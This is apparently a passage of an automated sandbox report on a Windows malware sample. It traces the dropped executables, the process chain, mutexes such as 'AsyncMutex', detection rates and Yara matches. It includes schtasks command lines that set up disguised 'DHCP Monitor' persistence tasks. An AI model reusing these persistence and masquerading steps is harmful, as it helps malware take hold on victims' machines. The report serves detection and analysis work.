            Source: ._cache_WINDOWS.EXE.9.dr, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
            Source: ._cache_WINDOWS.EXE.9.dr, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 7.2.SYSTEM32.EXE.da0000.0.unpack, RXbHkqahxovcPAhX/DhyXMclpTuKggjB.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
            Source: 7.2.SYSTEM32.EXE.da0000.0.unpack, RXbHkqahxovcPAhX/DhyXMclpTuKggjB.cs Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: SYSTEM32.EXE.6.dr, RXbHkqahxovcPAhX/DhyXMclpTuKggjB.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
            Source: SYSTEM32.EXE.6.dr, RXbHkqahxovcPAhX/DhyXMclpTuKggjB.cs Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: C:\Users\user\Desktop\WINDOWS.EXE Code function: 9_2_00425FB8 GetLastError,FormatMessageA,9_2_00425FB8
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
            Source: C:\Users\user\Desktop\WINDOWS.EXE Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
            Source: C:\ProgramData\Synaptics\Synaptics.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
            Source: C:\ProgramData\Synaptics\Synaptics.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
            Source: C:\ProgramData\Synaptics\Synaptics.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exe Code function: 4_2_004747D8 FindResourceA,4_2_004747D8
            Source: C:\Users\user\Desktop\._cache_WINDOWS.EXE File created: C:\Program Files (x86)\DHCP Monitor
            Source: y8kdmHi6x3.exe Virustotal: Detection: 57%
            Source: y8kdmHi6x3.exe Metadefender: Detection: 48%
            Source: y8kdmHi6x3.exe ReversingLabs: Detection: 81%
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exe File read: C:\Users\user\Desktop\y8kdmHi6x3.exe
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: unknown Process created: C:\Users\user\Desktop\y8kdmHi6x3.exe "C:\Users\user\Desktop\y8kdmHi6x3.exe"
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exe Process created: C:\Users\user\Desktop\y8kdmHi6x3.exe C:\Users\user\Desktop\y8kdmHi6x3.exe
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exe Process created: C:\Users\user\Desktop\._cache_y8kdmHi6x3.exe "C:\Users\user\Desktop\._cache_y8kdmHi6x3.exe"
            Source: C:\Users\user\Desktop\._cache_y8kdmHi6x3.exe Process created: C:\Users\user\Desktop\SYSTEM32.EXE "C:\Users\user\Desktop\SYSTEM32.EXE"
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exe Process created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
            Source: C:\Users\user\Desktop\._cache_y8kdmHi6x3.exe Process created: C:\Users\user\Desktop\WINDOWS.EXE "C:\Users\user\Desktop\WINDOWS.EXE"
            Source: C:\Users\user\Desktop\WINDOWS.EXE Process created: C:\Users\user\Desktop\._cache_WINDOWS.EXE "C:\Users\user\Desktop\._cache_WINDOWS.EXE"
            Source: C:\Users\user\Desktop\WINDOWS.EXE Process created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
            Source: C:\Users\user\Desktop\._cache_WINDOWS.EXE Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "DHCP Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmp939D.tmp
            Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknown Process created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe"
            Source: unknown Process created: C:\Users\user\Desktop\._cache_WINDOWS.EXE C:\Users\user\Desktop\._cache_WINDOWS.EXE 0
            Source: C:\Users\user\Desktop\._cache_WINDOWS.EXE Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "DHCP Monitor Task" /xml "C:\Users\user\AppData\Local\Temp\tmp9EC9.tmp
            Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknown Process created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe "C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe" 0
            Source: C:\ProgramData\Synaptics\Synaptics.exe Process created: C:\ProgramData\Synaptics\Synaptics.exe C:\ProgramData\Synaptics\Synaptics.exe
            Source: C:\ProgramData\Synaptics\Synaptics.exe Process created: C:\ProgramData\Synaptics\Synaptics.exe C:\ProgramData\Synaptics\Synaptics.exe
            Source: C:\ProgramData\Synaptics\Synaptics.exe Process created: C:\ProgramData\Synaptics\Synaptics.exe C:\ProgramData\Synaptics\Synaptics.exe
            Source: C:\ProgramData\Synaptics\Synaptics.exe Process created: C:\Users\user\Desktop\._cache_Synaptics.exe "C:\Users\user\Desktop\._cache_Synaptics.exe"
            Source: C:\Users\user\Desktop\._cache_Synaptics.exe Process created: C:\Users\user\Desktop\SYSTEM32.EXE "C:\Users\user\Desktop\SYSTEM32.EXE"
            Source: C:\Users\user\Desktop\._cache_Synaptics.exe Process created: C:\Users\user\Desktop\WINDOWS.EXE "C:\Users\user\Desktop\WINDOWS.EXE"
            Source: C:\ProgramData\Synaptics\Synaptics.exe Process created: C:\Users\user\Desktop\._cache_Synaptics.exe "C:\Users\user\Desktop\._cache_Synaptics.exe"
            Source: C:\Users\user\Desktop\._cache_Synaptics.exe Process created: C:\Users\user\Desktop\SYSTEM32.EXE "C:\Users\user\Desktop\SYSTEM32.EXE"
            Source: unknown Process created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding
            Source: C:\Users\user\Desktop\._cache_Synaptics.exe Process created: C:\Users\user\Desktop\WINDOWS.EXE "C:\Users\user\Desktop\WINDOWS.EXE"
            Source: C:\Users\user\Desktop\WINDOWS.EXE Process created: C:\Users\user\Desktop\._cache_WINDOWS.EXE "C:\Users\user\Desktop\._cache_WINDOWS.EXE"
            Source: C:\Users\user\Desktop\WINDOWS.EXE Process created: C:\Users\user\Desktop\._cache_WINDOWS.EXE "C:\Users\user\Desktop\._cache_WINDOWS.EXE"
            Source: C:\ProgramData\Synaptics\Synaptics.exe Process created: C:\ProgramData\Synaptics\._cache_Synaptics.exe "C:\ProgramData\Synaptics\._cache_Synaptics.exe"
            Source: C:\ProgramData\Synaptics\._cache_Synaptics.exe Process created: C:\ProgramData\Synaptics\SYSTEM32.EXE "C:\ProgramData\Synaptics\SYSTEM32.EXE"
            Source: C:\ProgramData\Synaptics\._cache_Synaptics.exe Process created: C:\ProgramData\Synaptics\WINDOWS.EXE "C:\ProgramData\Synaptics\WINDOWS.EXE"
            Source: C:\ProgramData\Synaptics\WINDOWS.EXE Process created: C:\ProgramData\Synaptics\._cache_WINDOWS.EXE "C:\ProgramData\Synaptics\._cache_WINDOWS.EXE"
            Source: C:\ProgramData\Synaptics\Synaptics.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5684 -s 3668
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exe Process created: C:\Users\user\Desktop\y8kdmHi6x3.exe C:\Users\user\Desktop\y8kdmHi6x3.exe
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exe Process created: C:\Users\user\Desktop\._cache_y8kdmHi6x3.exe "C:\Users\user\Desktop\._cache_y8kdmHi6x3.exe"
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exe Process created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
            Source: C:\Users\user\Desktop\._cache_y8kdmHi6x3.exe Process created: C:\Users\user\Desktop\SYSTEM32.EXE "C:\Users\user\Desktop\SYSTEM32.EXE"
            Source: C:\Users\user\Desktop\._cache_y8kdmHi6x3.exe Process created: C:\Users\user\Desktop\WINDOWS.EXE "C:\Users\user\Desktop\WINDOWS.EXE"
            Source: C:\ProgramData\Synaptics\Synaptics.exe Process created: C:\ProgramData\Synaptics\Synaptics.exe C:\ProgramData\Synaptics\Synaptics.exe
            Source: C:\Users\user\Desktop\WINDOWS.EXE Process created: C:\Users\user\Desktop\._cache_WINDOWS.EXE "C:\Users\user\Desktop\._cache_WINDOWS.EXE"
            Source: C:\Users\user\Desktop\WINDOWS.EXE Process created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
            Source: C:\Users\user\Desktop\._cache_WINDOWS.EXE Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "DHCP Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmp939D.tmp
            Source: C:\Users\user\Desktop\._cache_WINDOWS.EXE Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "DHCP Monitor Task" /xml "C:\Users\user\AppData\Local\Temp\tmp9EC9.tmp
            Source: C:\ProgramData\Synaptics\Synaptics.exe Process created: C:\ProgramData\Synaptics\Synaptics.exe C:\ProgramData\Synaptics\Synaptics.exe
            Source: C:\ProgramData\Synaptics\Synaptics.exe Process created: C:\ProgramData\Synaptics\Synaptics.exe C:\ProgramData\Synaptics\Synaptics.exe
            Source: C:\ProgramData\Synaptics\Synaptics.exe Process created: C:\Users\user\Desktop\._cache_Synaptics.exe "C:\Users\user\Desktop\._cache_Synaptics.exe"
            Source: C:\ProgramData\Synaptics\Synaptics.exe Process created: C:\Users\user\Desktop\._cache_Synaptics.exe "C:\Users\user\Desktop\._cache_Synaptics.exe"
            Source: C:\ProgramData\Synaptics\Synaptics.exe Process created: C:\ProgramData\Synaptics\._cache_Synaptics.exe "C:\ProgramData\Synaptics\._cache_Synaptics.exe"
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
            Source: C:\Users\user\Desktop\WINDOWS.EXE Code function: 9_2_00475958 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,GetLastError,GetLastError,9_2_00475958
            Source: C:\Users\user\Desktop\._cache_WINDOWS.EXE File created: C:\Users\user\AppData\Local\Temp\tmp939D.tmp
            Source: C:\Users\user\Desktop\WINDOWS.EXE Code function: 9_2_00409ED2 GetDiskFreeSpaceA,9_2_00409ED2
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
            Source: C:\Users\user\Desktop\SYSTEM32.EXE Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
            Source: C:\ProgramData\Synaptics\Synaptics.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
            Source: C:\Users\user\Desktop\._cache_WINDOWS.EXE Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
            Source: C:\Users\user\Desktop\._cache_WINDOWS.EXE Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
            Source: C:\Users\user\Desktop\._cache_WINDOWS.EXE Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
            Source: C:\ProgramData\Synaptics\Synaptics.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
            Source: C:\ProgramData\Synaptics\Synaptics.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
            Source: C:\Users\user\Desktop\._cache_WINDOWS.EXE Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
            Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
            Source: SYSTEM32.EXE.6.dr, eVWbregzvU/yvcwMXCsTRJU.cs Base64 encoded string
            Source: 7.0.SYSTEM32.EXE.da0000.0.unpack, eVWbregzvU/yvcwMXCsTRJU.cs Base64 encoded string
            Source: 7.2.SYSTEM32.EXE.da0000.0.unpack, eVWbregzvU/yvcwMXCsTRJU.cs Base64 encoded string
            Source: C:\Users\user\Desktop\._cache_WINDOWS.EXE Mutant created: \Sessions\1\BaseNamedObjects\Global\{fd5fd13e-0f57-4bfb-84a4-034a7f99c7fe}
            Source: C:\Users\user\Desktop\SYSTEM32.EXE Mutant created: \Sessions\1\BaseNamedObjects\AsyncMutex_6SI8OkPnk
            Source: C:\Users\user\Desktop\._cache_WINDOWS.EXE Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
            Source: C:\ProgramData\Synaptics\Synaptics.exe Mutant created: \Sessions\1\BaseNamedObjects\Synaptics2X
            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4508:120:WilError_01
            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6564:120:WilError_01
            Source: C:\Users\user\Desktop\._cache_y8kdmHi6x3.exe Command line argument: shell32.dll 6_2_003C1320
            Source: C:\Users\user\Desktop\._cache_y8kdmHi6x3.exe Command line argument: ShellExecuteA 6_2_003C1320
            Source: C:\Users\user\Desktop\._cache_y8kdmHi6x3.exe Command line argument: RBIND 6_2_003C1320
            Source: C:\Users\user\Desktop\._cache_y8kdmHi6x3.exe Command line argument: C< 6_2_003C4330
            Source: C:\ProgramData\Synaptics\Synaptics.exe File written: C:\Users\user\AppData\Local\Temp\ohdSUNQ.ini
            Source: Yara match File source: 20.0.Synaptics.exe.400000.31.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 20.0.Synaptics.exe.400000.10.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 21.0.Synaptics.exe.400000.10.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 21.0.Synaptics.exe.400000.12.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 23.0.Synaptics.exe.400000.12.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 4.0.y8kdmHi6x3.exe.400000.12.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 4.0.y8kdmHi6x3.exe.4c4d1c.17.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 20.0.Synaptics.exe.4b8e54.23.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 20.0.Synaptics.exe.4b8e54.19.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 21.2.Synaptics.exe.4b8e54.3.unpack, type: UNPACKEDPE
            Source: Yara match File source: 4.0.y8kdmHi6x3.exe.4c4d1c.23.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 20.0.Synaptics.exe.400000.14.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 23.0.Synaptics.exe.400000.14.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 8.2.Synaptics.exe.4cb40a4.5.unpack, type: UNPACKEDPE
            Source: Yara match File source: 4.0.y8kdmHi6x3.exe.400000.8.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 4.0.y8kdmHi6x3.exe.400000.16.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 20.0.Synaptics.exe.400000.16.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 4.0.y8kdmHi6x3.exe.400000.21.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 21.0.Synaptics.exe.400000.21.unpack, type: UNPACKEDPE
            Source: Yara match File source: 20.0.Synaptics.exe.400000.26.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 23.0.Synaptics.exe.400000.6.unpack, type: UNPACKEDPE
            Source: Yara match File source: 4.2.y8kdmHi6x3.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match File source: 20.0.Synaptics.exe.400000.12.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 4.2.y8kdmHi6x3.exe.4b8e54.3.unpack, type: UNPACKEDPE
            Source: Yara match File source: 4.0.y8kdmHi6x3.exe.400000.16.unpack, type: UNPACKEDPE
            Source: Yara match File source: 20.0.Synaptics.exe.4b8e54.28.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 21.2.Synaptics.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match File source: 4.0.y8kdmHi6x3.exe.400000.6.unpack, type: UNPACKEDPE
            Source: Yara match File source: 21.0.Synaptics.exe.4b8e54.24.unpack, type: UNPACKEDPE
            Source: Yara match File source: 0.2.y8kdmHi6x3.exe.45f40a4.4.unpack, type: UNPACKEDPE
            Source: Yara match File source: 20.0.Synaptics.exe.4c4d1c.22.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 23.0.Synaptics.exe.400000.8.unpack, type: UNPACKEDPE
            Source: Yara match File source: 4.0.y8kdmHi6x3.exe.4b8e54.24.unpack, type: UNPACKEDPE
            Source: Yara match File source: 21.0.Synaptics.exe.400000.8.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 4.0.y8kdmHi6x3.exe.4b8e54.19.unpack, type: UNPACKEDPE
            Source: Yara match File source: 4.0.y8kdmHi6x3.exe.400000.6.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 20.0.Synaptics.exe.4c4d1c.27.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 4.0.y8kdmHi6x3.exe.4b8e54.19.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 4.0.y8kdmHi6x3.exe.400000.10.unpack, type: UNPACKEDPE
            Source: Yara match File source: 21.0.Synaptics.exe.4c4d1c.17.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 20.0.Synaptics.exe.4b8e54.34.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 6.2.._cache_y8kdmHi6x3.exe.3c0000.0.unpack, type: UNPACKEDPE
            Source: Yara match File source: 20.2.Synaptics.exe.4c4d1c.1.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 4.0.y8kdmHi6x3.exe.400000.10.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 23.0.Synaptics.exe.400000.12.unpack, type: UNPACKEDPE
            Source: Yara match File source: 21.0.Synaptics.exe.4b8e54.24.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 21.0.Synaptics.exe.400000.12.unpack, type: UNPACKEDPE
            Source: Yara match File source: 0.2.y8kdmHi6x3.exe.3fef190.3.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 23.0.Synaptics.exe.400000.10.unpack, type: UNPACKEDPE
            Source: Yara match File source: 20.0.Synaptics.exe.400000.10.unpack, type: UNPACKEDPE
            Source: Yara match File source: 21.0.Synaptics.exe.400000.14.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 9.2.WINDOWS.EXE.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match File source: 21.2.Synaptics.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 23.2.Synaptics.exe.4b8e54.3.unpack, type: UNPACKEDPE
            Source: Yara match File source: 4.0.y8kdmHi6x3.exe.400000.8.unpack, type: UNPACKEDPE
            Source: Yara match File source: 21.2.Synaptics.exe.4c4d1c.1.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 23.0.Synaptics.exe.400000.21.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 23.0.Synaptics.exe.4b8e54.23.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 20.0.Synaptics.exe.400000.16.unpack, type: UNPACKEDPE
            Source: Yara match File source: 0.2.y8kdmHi6x3.exe.3e27d70.2.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 20.0.Synaptics.exe.4b8e54.28.unpack, type: UNPACKEDPE
            Source: Yara match File source: 20.0.Synaptics.exe.400000.12.unpack, type: UNPACKEDPE
            Source: Yara match File source: 15.2.Synaptics.exe.46e7d70.1.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 23.0.Synaptics.exe.400000.16.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 23.0.Synaptics.exe.4c4d1c.17.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 8.2.Synaptics.exe.4cbff6c.6.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 20.2.Synaptics.exe.4b8e54.2.unpack, type: UNPACKEDPE
            Source: Yara match File source: 21.0.Synaptics.exe.400000.16.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 23.0.Synaptics.exe.400000.14.unpack, type: UNPACKEDPE
            Source: Yara match File source: 4.0.y8kdmHi6x3.exe.400000.4.unpack, type: UNPACKEDPE
            Source: Yara match File source: 20.2.Synaptics.exe.4b8e54.2.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 8.2.Synaptics.exe.4cb40a4.5.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 23.2.Synaptics.exe.4c4d1c.1.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 21.0.Synaptics.exe.400000.4.unpack, type: UNPACKEDPE
            Source: Yara match File source: 21.0.Synaptics.exe.400000.8.unpack, type: UNPACKEDPE
            Source: Yara match File source: 20.0.Synaptics.exe.400000.6.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 12.2.Synaptics.exe.45da750.4.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 20.0.Synaptics.exe.400000.31.unpack, type: UNPACKEDPE
            Source: Yara match File source: 20.0.Synaptics.exe.400000.8.unpack, type: UNPACKEDPE
            Source: Yara match File source: 20.0.Synaptics.exe.4c4d1c.33.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 23.0.Synaptics.exe.400000.10.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 20.0.Synaptics.exe.400000.21.unpack, type: UNPACKEDPE
            Source: Yara match File source: 23.0.Synaptics.exe.4c4d1c.22.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 23.2.Synaptics.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match File source: 12.2.Synaptics.exe.40cf190.1.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 6.0.._cache_y8kdmHi6x3.exe.3cf0c8.2.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 21.0.Synaptics.exe.4b8e54.19.unpack, type: UNPACKEDPE
            Source: Yara match File source: 21.2.Synaptics.exe.4b8e54.3.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 4.2.y8kdmHi6x3.exe.4c4d1c.1.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 0.2.y8kdmHi6x3.exe.45fff6c.6.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 12.2.Synaptics.exe.46d40a4.6.unpack, type: UNPACKEDPE
            Source: Yara match File source: 20.0.Synaptics.exe.4b8e54.19.unpack, type: UNPACKEDPE
            Source: Yara match File source: 4.2.y8kdmHi6x3.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 21.0.Synaptics.exe.400000.14.unpack, type: UNPACKEDPE
            Source: Yara match File source: 0.2.y8kdmHi6x3.exe.44fa750.5.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 23.0.Synaptics.exe.400000.8.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 6.2.._cache_y8kdmHi6x3.exe.3cf0c8.2.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 20.0.Synaptics.exe.400000.14.unpack, type: UNPACKEDPE
            Source: Yara match File source: 21.0.Synaptics.exe.400000.6.unpack, type: UNPACKEDPE
            Source: Yara match File source: 20.0.Synaptics.exe.400000.21.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 21.0.Synaptics.exe.400000.16.unpack, type: UNPACKEDPE
            Source: Yara match File source: 12.2.Synaptics.exe.3f07d70.3.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 23.0.Synaptics.exe.4b8e54.19.unpack, type: UNPACKEDPE
            Source: Yara match File source: 6.0.._cache_y8kdmHi6x3.exe.3c0000.0.unpack, type: UNPACKEDPE
            Source: Yara match File source: 4.0.y8kdmHi6x3.exe.400000.12.unpack, type: UNPACKEDPE
            Source: Yara match File source: 21.0.Synaptics.exe.4b8e54.19.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 20.0.Synaptics.exe.400000.8.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 23.0.Synaptics.exe.400000.21.unpack, type: UNPACKEDPE
            Source: Yara match File source: 20.0.Synaptics.exe.400000.4.unpack, type: UNPACKEDPE
            Source: Yara match File source: 23.0.Synaptics.exe.400000.6.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 20.0.Synaptics.exe.4b8e54.34.unpack, type: UNPACKEDPE
            Source: Yara match File source: 20.0.Synaptics.exe.4b8e54.23.unpack, type: UNPACKEDPE
            Source: Yara match File source: 4.2.y8kdmHi6x3.exe.4b8e54.3.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 21.0.Synaptics.exe.400000.21.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 12.2.Synaptics.exe.46d40a4.6.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 15.2.Synaptics.exe.4eb40a4.6.unpack, type: UNPACKEDPE
            Source: Yara match File source: 23.2.Synaptics.exe.4b8e54.3.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 20.0.Synaptics.exe.400000.26.unpack, type: UNPACKEDPE
            Source: Yara match File source: 23.0.Synaptics.exe.4b8e54.19.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 8.2.Synaptics.exe.46af190.3.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 4.0.y8kdmHi6x3.exe.400000.14.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 0.2.y8kdmHi6x3.exe.45f40a4.4.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 8.2.Synaptics.exe.44e7d70.1.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 20.2.Synaptics.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 23.0.Synaptics.exe.4b8e54.23.unpack, type: UNPACKEDPE
            Source: Yara match File source: 23.0.Synaptics.exe.400000.16.unpack, type: UNPACKEDPE
            Source: Yara match File source: 4.0.y8kdmHi6x3.exe.400000.21.unpack, type: UNPACKEDPE
            Source: Yara match File source: 9.0.WINDOWS.EXE.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match File source: 23.2.Synaptics.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 23.0.Synaptics.exe.400000.4.unpack, type: UNPACKEDPE
            Source: Yara match File source: 21.0.Synaptics.exe.400000.6.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 20.0.Synaptics.exe.4c4d1c.18.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 20.0.Synaptics.exe.400000.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.Synaptics.exe.46dff6c.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.4c4d1c.23.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 15.2.Synaptics.exe.4ebff6c.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.4b8e54.24.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.400000.10.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.400000.14.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.2.Synaptics.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 15.2.Synaptics.exe.48af190.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 15.2.Synaptics.exe.4eb40a4.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 15.2.Synaptics.exe.4dba750.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.Synaptics.exe.4320940.2.raw.unpack, type: UNPACKEDPE
